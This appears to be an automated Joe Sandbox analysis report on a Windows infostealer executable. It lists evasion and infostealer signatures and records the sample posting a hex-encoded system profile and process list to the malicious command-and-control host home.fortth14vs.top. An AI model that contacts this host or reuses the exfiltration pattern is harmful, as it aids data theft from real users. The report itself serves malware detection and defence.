Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XJiB3BdLTg.exe

Overview

General Information

Sample name:XJiB3BdLTg.exe
renamed because original name is a hash value
Original sample name:767f4aff1a89b1abfe6a843f7750bd5b.exe
Analysis ID:1582830
MD5:767f4aff1a89b1abfe6a843f7750bd5b
SHA1:d05134107cb88e143b16ca89cb6f3ec675d06d36
SHA256:68783c123f5c9c302811fc6391329010a372fc583f5af03c4f65d0656a8a165e
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected non-DNS traffic on DNS port
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • XJiB3BdLTg.exe (PID: 5512 cmdline: "C:\Users\user\Desktop\XJiB3BdLTg.exe" MD5: 767F4AFF1A89B1ABFE6A843F7750BD5B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: XJiB3BdLTg.exeAvira: detected
Antivirus detection for URL or domain
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahAvira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: XJiB3BdLTg.exeVirustotal: Detection: 48%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: XJiB3BdLTg.exeJoe Sandbox ML: detected
Source: XJiB3BdLTg.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0022A5B0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0022B560
Source: XJiB3BdLTg.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001C255D
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001C29FF
Source: global trafficTCP traffic: 192.168.2.3:54446 -> 162.159.36.2:53
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 502792Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 37 32 39 36 31 32 38 38 32 37 38 31 31 35 30 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 38 34 20 7d 2c
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0028A870 recv,0_2_0028A870
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: unknownHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 502792Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 37 32 39 36 31 32 38 38 32 37 38 31 31 35 30 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 38 34 20 7d 2c
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:42:15 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:42:17 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1
Source: XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4
Source: XJiB3BdLTg.exe, 00000000.00000003.1629553495.0000000001633000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670373855.0000000001635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: XJiB3BdLTg.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: XJiB3BdLTg.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: XJiB3BdLTg.exe, XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443

System Summary

barindex
PE file contains section with special chars
Source: XJiB3BdLTg.exeStatic PE information: section name:
Source: XJiB3BdLTg.exeStatic PE information: section name: .idata
Source: XJiB3BdLTg.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001D05B00_2_001D05B0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001D6FA00_2_001D6FA0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001FF1000_2_001FF100
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0028B1800_2_0028B180
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0054E0500_2_0054E050
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0054A0000_2_0054A000
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_002900E00_2_002900E0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_002262100_2_00226210
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0028C3200_2_0028C320
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0028E3E00_2_0028E3E0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_002904200_2_00290420
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_005144100_2_00514410
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001CE6200_2_001CE620
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0028C7700_2_0028C770
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_005267300_2_00526730
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0022A7F00_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_005447800_2_00544780
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0027C9000_2_0027C900
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001D49400_2_001D4940
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001CA9600_2_001CA960
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0047AAC00_2_0047AAC0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00396AC00_2_00396AC0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00354B600_2_00354B60
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0047AB2C0_2_0047AB2C
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00538BF00_2_00538BF0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001CCBB00_2_001CCBB0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0054CC900_2_0054CC90
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00544D400_2_00544D40
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00380D800_2_00380D80
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0053CD800_2_0053CD80
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_004DAE300_2_004DAE30
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001E4F700_2_001E4F70
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0028EF900_2_0028EF90
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00288F900_2_00288F90
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00512F900_2_00512F90
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001D10E60_2_001D10E6
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0052D4300_2_0052D430
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_005335B00_2_005335B0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_005517A00_2_005517A0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_002798800_2_00279880
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_005199200_2_00519920
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00543A700_2_00543A70
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00531BD00_2_00531BD0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00201BE00_2_00201BE0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 001CC960 appears 32 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 00377220 appears 103 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 002A44A0 appears 67 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 001C75A0 appears 642 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 002050A0 appears 90 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 001C73F0 appears 110 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 001DCD40 appears 78 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 001DCCD0 appears 54 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 00205340 appears 45 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 00204F40 appears 291 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 00204FD0 appears 252 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 001CCAA0 appears 61 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 001C71E0 appears 46 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: String function: 0039CBC0 appears 99 times
